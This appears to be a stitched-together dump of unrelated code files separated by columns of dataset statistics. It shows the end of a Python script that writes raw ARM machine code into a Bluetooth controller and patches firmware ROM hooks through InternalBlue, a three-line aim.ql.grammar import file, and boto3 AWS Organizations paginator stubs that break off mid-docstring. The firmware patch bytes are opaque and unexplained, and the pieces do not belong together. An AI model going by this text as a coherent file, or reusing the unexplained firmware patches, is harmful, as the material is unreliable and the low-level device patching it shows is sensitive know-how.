internalblue.writeMem(0x00219300, bytes.fromhex('30b4044600788008431e1c2b0bd80d1814f8012fd30943ea420301f8013b8d42f6d130bc7047002030bc7047'))
# Hooks
print("Installing Hooks...")
internalblue.patchRom(0x000715b4, bytes.fromhex('9ff124bb'))
internalblue.patchRom(0x00071e2c, bytes.fromhex('a3f168b8'))
internalblue.patchRom(0x00074da8, bytes.fromhex('9ff12abb'))
internalblue.patchRom(0x00074f92, bytes.fromhex('9ff1b5ba'))
internalblue.patchRom(0x00079fa8, bytes.fromhex('9ef1aabe'))
internalblue.patchRom(0x0007a192, bytes.fromhex('96f135be'))
internalblue.patchRom(0x0007c88c, bytes.fromhex('93f138bf'))
internalblue.patchRom(0x0009002e, bytes.fromhex('2022fff7'))
internalblue.patchRom(0x0009007c, bytes.fromhex('80f140be'))
internalblue.patchRom(0x000f2398, bytes.fromhex('010f2100'))
internalblue.patchRom(0x000f239c, bytes.fromhex('00000800'))
internalblue.patchRom(0x000f23a0, bytes.fromhex('01462100'))
internalblue.patchRom(0x000f23a4, bytes.fromhex('00000800'))
print("Terminated :)")
# shutdown connection
internalblue.shutdown()
os._exit(0)
| 152.2625
| 2,092
| 0.941056
| 389
| 12,181
| 29.462725
| 0.354756
| 0.053398
| 0.01745
| 0.027921
| 0.034901
| 0
| 0
| 0
| 0
| 0
| 0
| 0.533317
| 0.015598
| 12,181
| 79
| 2,093
| 154.189873
| 0.422484
| 0.01174
| 0
| 0
| 0
| 0
| 0.744389
| 0.716376
| 0
| 1
| 0.042394
| 0
| 0
| 1
| 0
| false
| 0
| 0.074627
| 0
| 0.074627
| 0.074627
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50f342557cf3dbb7e54f8040720d090511ea4f58
| 133
|
py
|
Python
|
aim/ql/grammar/__init__.py
|
VkoHov/aim
|
92567b48437a8c71b4bde3b034fc0e5c61479cf9
|
[
"Apache-2.0"
] | 1
|
2021-07-19T19:21:30.000Z
|
2021-07-19T19:21:30.000Z
|
aim/ql/grammar/__init__.py
|
VkoHov/aim
|
92567b48437a8c71b4bde3b034fc0e5c61479cf9
|
[
"Apache-2.0"
] | 2
|
2021-08-25T16:17:16.000Z
|
2022-02-10T05:49:55.000Z
|
aim/ql/grammar/__init__.py
|
paulmchen/aim
|
53212cdce7a80cb8dadfaf7869a31fbf4ee6ce5b
|
[
"Apache-2.0"
] | 1
|
2021-01-29T02:10:14.000Z
|
2021-01-29T02:10:14.000Z
|
from aim.ql.grammar.atom import Atom
from aim.ql.grammar.expression import Expression
from aim.ql.grammar.statement import Statement
| 33.25
| 48
| 0.842105
| 21
| 133
| 5.333333
| 0.380952
| 0.1875
| 0.241071
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090226
| 133
| 3
| 49
| 44.333333
| 0.92562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0fcf0dad42fe04d3954ecbc0ab5aa7ce92896781
| 62,935
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/organizations/paginator.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from typing import List
from botocore.paginate import Paginator
class ListAWSServiceAccessForOrganization(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_aws_service_access_for_organization`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAWSServiceAccessForOrganization>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'EnabledServicePrincipals': [
{
'ServicePrincipal': 'string',
'DateEnabled': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **EnabledServicePrincipals** *(list) --*
A list of the service principals for the services that are enabled to integrate with your organization. Each principal is a structure that includes the name and the date that it was enabled for integration with AWS Organizations.
- *(dict) --*
A structure that contains details of a service principal that is enabled to integrate with AWS Organizations.
- **ServicePrincipal** *(string) --*
The name of the service principal. This is typically in the form of a URL, such as: `` *servicename* .amazonaws.com`` .
- **DateEnabled** *(datetime) --*
The date that the service principal was enabled for integration with AWS Organizations.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListAccounts(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_accounts`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAccounts>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Accounts': [
{
'Id': 'string',
'Arn': 'string',
'Email': 'string',
'Name': 'string',
'Status': 'ACTIVE'|'SUSPENDED',
'JoinedMethod': 'INVITED'|'CREATED',
'JoinedTimestamp': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **Accounts** *(list) --*
A list of objects in the organization.
- *(dict) --*
Contains information about an AWS account that is a member of an organization.
- **Id** *(string) --*
The unique identifier (ID) of the account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for an account ID string requires exactly 12 digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the account.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Email** *(string) --*
The email address associated with the AWS account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for this parameter is a string of characters that represents a standard Internet email address.
- **Name** *(string) --*
The friendly name of the account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **Status** *(string) --*
The status of the account in the organization.
- **JoinedMethod** *(string) --*
The method by which the account joined the organization.
- **JoinedTimestamp** *(datetime) --*
The date the account became a part of the organization.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListAccountsForParent(Paginator):
def paginate(self, ParentId: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_accounts_for_parent`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListAccountsForParent>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ParentId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Accounts': [
{
'Id': 'string',
'Arn': 'string',
'Email': 'string',
'Name': 'string',
'Status': 'ACTIVE'|'SUSPENDED',
'JoinedMethod': 'INVITED'|'CREATED',
'JoinedTimestamp': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **Accounts** *(list) --*
A list of the accounts in the specified root or OU.
- *(dict) --*
Contains information about an AWS account that is a member of an organization.
- **Id** *(string) --*
The unique identifier (ID) of the account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for an account ID string requires exactly 12 digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the account.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Email** *(string) --*
The email address associated with the AWS account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for this parameter is a string of characters that represents a standard Internet email address.
- **Name** *(string) --*
The friendly name of the account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
- **Status** *(string) --*
The status of the account in the organization.
- **JoinedMethod** *(string) --*
The method by which the account joined the organization.
- **JoinedTimestamp** *(datetime) --*
The date the account became a part of the organization.
:type ParentId: string
:param ParentId: **[REQUIRED]**
The unique identifier (ID) for the parent root or organization unit (OU) whose accounts you want to list.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListChildren(Paginator):
def paginate(self, ParentId: str, ChildType: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_children`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListChildren>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ParentId='string',
ChildType='ACCOUNT'|'ORGANIZATIONAL_UNIT',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Children': [
{
'Id': 'string',
'Type': 'ACCOUNT'|'ORGANIZATIONAL_UNIT'
},
],
}
**Response Structure**
- *(dict) --*
- **Children** *(list) --*
The list of children of the specified parent container.
- *(dict) --*
Contains a list of child entities, either OUs or accounts.
- **Id** *(string) --*
The unique identifier (ID) of this child entity.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a child ID string requires one of the following:
* Account: a string that consists of exactly 12 digits.
* Organizational unit (OU): a string that begins with "ou-" followed by from 4 to 32 lower-case letters or digits (the ID of the root that contains the OU) followed by a second "-" dash and from 8 to 32 additional lower-case letters or digits.
- **Type** *(string) --*
The type of this child entity.
:type ParentId: string
:param ParentId: **[REQUIRED]**
The unique identifier (ID) for the parent root or OU whose children you want to list.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for a parent ID string requires one of the following:
* Root: a string that begins with \"r-\" followed by from 4 to 32 lower-case letters or digits.
* Organizational unit (OU): a string that begins with \"ou-\" followed by from 4 to 32 lower-case letters or digits (the ID of the root that the OU is in) followed by a second \"-\" dash and from 8 to 32 additional lower-case letters or digits.
:type ChildType: string
:param ChildType: **[REQUIRED]**
Filters the output to include only the specified child type.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListCreateAccountStatus(Paginator):
def paginate(self, States: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_create_account_status`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListCreateAccountStatus>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
States=[
'IN_PROGRESS'|'SUCCEEDED'|'FAILED',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'CreateAccountStatuses': [
{
'Id': 'string',
'AccountName': 'string',
'State': 'IN_PROGRESS'|'SUCCEEDED'|'FAILED',
'RequestedTimestamp': datetime(2015, 1, 1),
'CompletedTimestamp': datetime(2015, 1, 1),
'AccountId': 'string',
'GovCloudAccountId': 'string',
'FailureReason': 'ACCOUNT_LIMIT_EXCEEDED'|'EMAIL_ALREADY_EXISTS'|'INVALID_ADDRESS'|'INVALID_EMAIL'|'CONCURRENT_ACCOUNT_MODIFICATION'|'INTERNAL_FAILURE'
},
],
}
**Response Structure**
- *(dict) --*
- **CreateAccountStatuses** *(list) --*
A list of objects with details about the requests. Certain elements, such as the accountId number, are present in the output only after the account has been successfully created.
- *(dict) --*
Contains the status about a CreateAccount or CreateGovCloudAccount request to create an AWS account or an AWS GovCloud (US) account in an organization.
- **Id** *(string) --*
The unique identifier (ID) that references this request. You get this value from the response of the initial CreateAccount request to create the account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for an create account request ID string requires "car-" followed by from 8 to 32 lower-case letters or digits.
- **AccountName** *(string) --*
The account name given to the account when it was created.
- **State** *(string) --*
The status of the request.
- **RequestedTimestamp** *(datetime) --*
The date and time that the request was made for the account creation.
- **CompletedTimestamp** *(datetime) --*
The date and time that the account was created and the request completed.
- **AccountId** *(string) --*
If the account was created successfully, the unique identifier (ID) of the new account.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for an account ID string requires exactly 12 digits.
- **GovCloudAccountId** *(string) --*
- **FailureReason** *(string) --*
If the request failed, a description of the reason for the failure.
* ACCOUNT_LIMIT_EXCEEDED: The account could not be created because you have reached the limit on the number of accounts in your organization.
* EMAIL_ALREADY_EXISTS: The account could not be created because another AWS account with that email address already exists.
* INVALID_ADDRESS: The account could not be created because the address you provided is not valid.
* INVALID_EMAIL: The account could not be created because the email address you provided is not valid.
* INTERNAL_FAILURE: The account could not be created because of an internal failure. Try again later. If the problem persists, contact Customer Support.
:type States: list
:param States:
A list of one or more states that you want included in the response. If this parameter is not present, then all requests are included in the response.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListHandshakesForAccount(Paginator):
def paginate(self, Filter: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_handshakes_for_account`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListHandshakesForAccount>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filter={
'ActionType': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
'ParentHandshakeId': 'string'
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Handshakes': [
{
'Id': 'string',
'Arn': 'string',
'Parties': [
{
'Id': 'string',
'Type': 'ACCOUNT'|'ORGANIZATION'|'EMAIL'
},
],
'State': 'REQUESTED'|'OPEN'|'CANCELED'|'ACCEPTED'|'DECLINED'|'EXPIRED',
'RequestedTimestamp': datetime(2015, 1, 1),
'ExpirationTimestamp': datetime(2015, 1, 1),
'Action': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
'Resources': [
{
'Value': 'string',
'Type': 'ACCOUNT'|'ORGANIZATION'|'ORGANIZATION_FEATURE_SET'|'EMAIL'|'MASTER_EMAIL'|'MASTER_NAME'|'NOTES'|'PARENT_HANDSHAKE',
'Resources': {'... recursive ...'}
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Handshakes** *(list) --*
A list of Handshake objects with details about each of the handshakes that is associated with the specified account.
- *(dict) --*
Contains information that must be exchanged to securely establish a relationship between two accounts (an *originator* and a *recipient* ). For example, when a master account (the originator) invites another account (the recipient) to join its organization, the two accounts exchange information as a series of handshake requests and responses.
**Note:** Handshakes that are CANCELED, ACCEPTED, or DECLINED show up in lists for only 30 days after entering that state After that they are deleted.
- **Id** *(string) --*
The unique identifier (ID) of a handshake. The originating account creates the ID when it initiates the handshake.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires "h-" followed by from 8 to 32 lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of a handshake.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Parties** *(list) --*
Information about the two accounts that are participating in the handshake.
- *(dict) --*
Identifies a participant in a handshake.
- **Id** *(string) --*
The unique identifier (ID) for the party.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires "h-" followed by from 8 to 32 lower-case letters or digits.
- **Type** *(string) --*
The type of party.
- **State** *(string) --*
The current state of the handshake. Use the state to trace the flow of the handshake through the process from its creation to its acceptance. The meaning of each of the valid values is as follows:
* **REQUESTED** : This handshake was sent to multiple recipients (applicable to only some handshake types) and not all recipients have responded yet. The request stays in this state until all recipients respond.
* **OPEN** : This handshake was sent to multiple recipients (applicable to only some policy types) and all recipients have responded, allowing the originator to complete the handshake action.
* **CANCELED** : This handshake is no longer active because it was canceled by the originating account.
* **ACCEPTED** : This handshake is complete because it has been accepted by the recipient.
* **DECLINED** : This handshake is no longer active because it was declined by the recipient account.
* **EXPIRED** : This handshake is no longer active because the originator did not receive a response of any kind from the recipient before the expiration time (15 days).
- **RequestedTimestamp** *(datetime) --*
The date and time that the handshake request was made.
- **ExpirationTimestamp** *(datetime) --*
The date and time that the handshake expires. If the recipient of the handshake request fails to respond before the specified date and time, the handshake becomes inactive and is no longer valid.
- **Action** *(string) --*
The type of handshake, indicating what action occurs when the recipient accepts the handshake. The following handshake types are supported:
* **INVITE** : This type of handshake represents a request to join an organization. It is always sent from the master account to only non-member accounts.
* **ENABLE_ALL_FEATURES** : This type of handshake represents a request to enable all features in an organization. It is always sent from the master account to only *invited* member accounts. Created accounts do not receive this because those accounts were created by the organization's master account and approval is inferred.
* **APPROVE_ALL_FEATURES** : This type of handshake is sent from the Organizations service when all member accounts have approved the ``ENABLE_ALL_FEATURES`` invitation. It is sent only to the master account and signals the master that it can finalize the process to enable all features.
- **Resources** *(list) --*
Additional information that is needed to process the handshake.
- *(dict) --*
Contains additional data that is needed to process a handshake.
- **Value** *(string) --*
The information that is passed to the other party in the handshake. The format of the value string must match the requirements of the specified type.
- **Type** *(string) --*
The type of information being passed, specifying how the value is to be interpreted by the other party:
* ``ACCOUNT`` - Specifies an AWS account ID number.
* ``ORGANIZATION`` - Specifies an organization ID number.
* ``EMAIL`` - Specifies the email address that is associated with the account that receives the handshake.
* ``OWNER_EMAIL`` - Specifies the email address associated with the master account. Included as information about an organization.
* ``OWNER_NAME`` - Specifies the name associated with the master account. Included as information about an organization.
* ``NOTES`` - Additional text provided by the handshake initiator and intended for the recipient to read.
- **Resources** *(list) --*
When needed, contains an additional array of ``HandshakeResource`` objects.
:type Filter: dict
:param Filter:
Filters the handshakes that you want included in the response. The default is all types. Use the ``ActionType`` element to limit the output to only a specified type, such as ``INVITE`` , ``ENABLE_ALL_FEATURES`` , or ``APPROVE_ALL_FEATURES`` . Alternatively, for the ``ENABLE_ALL_FEATURES`` handshake that generates a separate child handshake for each member account, you can specify ``ParentHandshakeId`` to see only the handshakes that were generated by that parent request.
- **ActionType** *(string) --*
Specifies the type of handshake action.
If you specify ``ActionType`` , you cannot also specify ``ParentHandshakeId`` .
- **ParentHandshakeId** *(string) --*
Specifies the parent handshake. Only used for handshake types that are a child of another type.
If you specify ``ParentHandshakeId`` , you cannot also specify ``ActionType`` .
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires \"h-\" followed by from 8 to 32 lower-case letters or digits.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListHandshakesForOrganization(Paginator):
def paginate(self, Filter: Dict = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_handshakes_for_organization`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListHandshakesForOrganization>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filter={
'ActionType': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
'ParentHandshakeId': 'string'
},
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Handshakes': [
{
'Id': 'string',
'Arn': 'string',
'Parties': [
{
'Id': 'string',
'Type': 'ACCOUNT'|'ORGANIZATION'|'EMAIL'
},
],
'State': 'REQUESTED'|'OPEN'|'CANCELED'|'ACCEPTED'|'DECLINED'|'EXPIRED',
'RequestedTimestamp': datetime(2015, 1, 1),
'ExpirationTimestamp': datetime(2015, 1, 1),
'Action': 'INVITE'|'ENABLE_ALL_FEATURES'|'APPROVE_ALL_FEATURES'|'ADD_ORGANIZATIONS_SERVICE_LINKED_ROLE',
'Resources': [
{
'Value': 'string',
'Type': 'ACCOUNT'|'ORGANIZATION'|'ORGANIZATION_FEATURE_SET'|'EMAIL'|'MASTER_EMAIL'|'MASTER_NAME'|'NOTES'|'PARENT_HANDSHAKE',
'Resources': {'... recursive ...'}
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Handshakes** *(list) --*
A list of Handshake objects with details about each of the handshakes that are associated with an organization.
- *(dict) --*
Contains information that must be exchanged to securely establish a relationship between two accounts (an *originator* and a *recipient* ). For example, when a master account (the originator) invites another account (the recipient) to join its organization, the two accounts exchange information as a series of handshake requests and responses.
**Note:** Handshakes that are CANCELED, ACCEPTED, or DECLINED show up in lists for only 30 days after entering that state After that they are deleted.
- **Id** *(string) --*
The unique identifier (ID) of a handshake. The originating account creates the ID when it initiates the handshake.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires "h-" followed by from 8 to 32 lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of a handshake.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Parties** *(list) --*
Information about the two accounts that are participating in the handshake.
- *(dict) --*
Identifies a participant in a handshake.
- **Id** *(string) --*
The unique identifier (ID) for the party.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires "h-" followed by from 8 to 32 lower-case letters or digits.
- **Type** *(string) --*
The type of party.
- **State** *(string) --*
The current state of the handshake. Use the state to trace the flow of the handshake through the process from its creation to its acceptance. The meaning of each of the valid values is as follows:
* **REQUESTED** : This handshake was sent to multiple recipients (applicable to only some handshake types) and not all recipients have responded yet. The request stays in this state until all recipients respond.
* **OPEN** : This handshake was sent to multiple recipients (applicable to only some policy types) and all recipients have responded, allowing the originator to complete the handshake action.
* **CANCELED** : This handshake is no longer active because it was canceled by the originating account.
* **ACCEPTED** : This handshake is complete because it has been accepted by the recipient.
* **DECLINED** : This handshake is no longer active because it was declined by the recipient account.
* **EXPIRED** : This handshake is no longer active because the originator did not receive a response of any kind from the recipient before the expiration time (15 days).
- **RequestedTimestamp** *(datetime) --*
The date and time that the handshake request was made.
- **ExpirationTimestamp** *(datetime) --*
The date and time that the handshake expires. If the recipient of the handshake request fails to respond before the specified date and time, the handshake becomes inactive and is no longer valid.
- **Action** *(string) --*
The type of handshake, indicating what action occurs when the recipient accepts the handshake. The following handshake types are supported:
* **INVITE** : This type of handshake represents a request to join an organization. It is always sent from the master account to only non-member accounts.
* **ENABLE_ALL_FEATURES** : This type of handshake represents a request to enable all features in an organization. It is always sent from the master account to only *invited* member accounts. Created accounts do not receive this because those accounts were created by the organization's master account and approval is inferred.
* **APPROVE_ALL_FEATURES** : This type of handshake is sent from the Organizations service when all member accounts have approved the ``ENABLE_ALL_FEATURES`` invitation. It is sent only to the master account and signals the master that it can finalize the process to enable all features.
- **Resources** *(list) --*
Additional information that is needed to process the handshake.
- *(dict) --*
Contains additional data that is needed to process a handshake.
- **Value** *(string) --*
The information that is passed to the other party in the handshake. The format of the value string must match the requirements of the specified type.
- **Type** *(string) --*
The type of information being passed, specifying how the value is to be interpreted by the other party:
* ``ACCOUNT`` - Specifies an AWS account ID number.
* ``ORGANIZATION`` - Specifies an organization ID number.
* ``EMAIL`` - Specifies the email address that is associated with the account that receives the handshake.
* ``OWNER_EMAIL`` - Specifies the email address associated with the master account. Included as information about an organization.
* ``OWNER_NAME`` - Specifies the name associated with the master account. Included as information about an organization.
* ``NOTES`` - Additional text provided by the handshake initiator and intended for the recipient to read.
- **Resources** *(list) --*
When needed, contains an additional array of ``HandshakeResource`` objects.
:type Filter: dict
:param Filter:
A filter of the handshakes that you want included in the response. The default is all types. Use the ``ActionType`` element to limit the output to only a specified type, such as ``INVITE`` , ``ENABLE-ALL-FEATURES`` , or ``APPROVE-ALL-FEATURES`` . Alternatively, for the ``ENABLE-ALL-FEATURES`` handshake that generates a separate child handshake for each member account, you can specify the ``ParentHandshakeId`` to see only the handshakes that were generated by that parent request.
- **ActionType** *(string) --*
Specifies the type of handshake action.
If you specify ``ActionType`` , you cannot also specify ``ParentHandshakeId`` .
- **ParentHandshakeId** *(string) --*
Specifies the parent handshake. Only used for handshake types that are a child of another type.
If you specify ``ParentHandshakeId`` , you cannot also specify ``ActionType`` .
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for handshake ID string requires \"h-\" followed by from 8 to 32 lower-case letters or digits.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class ListOrganizationalUnitsForParent(Paginator):
def paginate(self, ParentId: str, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`Organizations.Client.list_organizational_units_for_parent`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/organizations-2016-11-28/ListOrganizationalUnitsForParent>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
ParentId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'OrganizationalUnits': [
{
'Id': 'string',
'Arn': 'string',
'Name': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **OrganizationalUnits** *(list) --*
A list of the OUs in the specified root or parent OU.
- *(dict) --*
Contains details about an organizational unit (OU). An OU is a container of AWS accounts within a root of an organization. Policies that are attached to an OU apply to all accounts contained in that OU and in any child OUs.
- **Id** *(string) --*
The unique identifier (ID) associated with this OU.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ for an organizational unit ID string requires "ou-" followed by from 4 to 32 lower-case letters or digits (the ID of the root that contains the OU) followed by a second "-" dash and from 8 to 32 additional lower-case letters or digits.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of this OU.
For more information about ARNs in Organizations, see `ARN Formats Supported by Organizations <https://docs.aws.amazon.com/organizations/latest/userguide/orgs_permissions.html#orgs-permissions-arns>`__ in the *AWS Organizations User Guide* .
- **Name** *(string) --*
The friendly name of this OU.
The `regex pattern <http://wikipedia.org/wiki/regex>`__ that is used to validate this parameter is a string of any of the characters in the ASCII character range.
:type ParentId: string
:param ParentId: **[REQUIRED]**
The unique identifier (ID) of the root or OU whose child OUs you want to list.
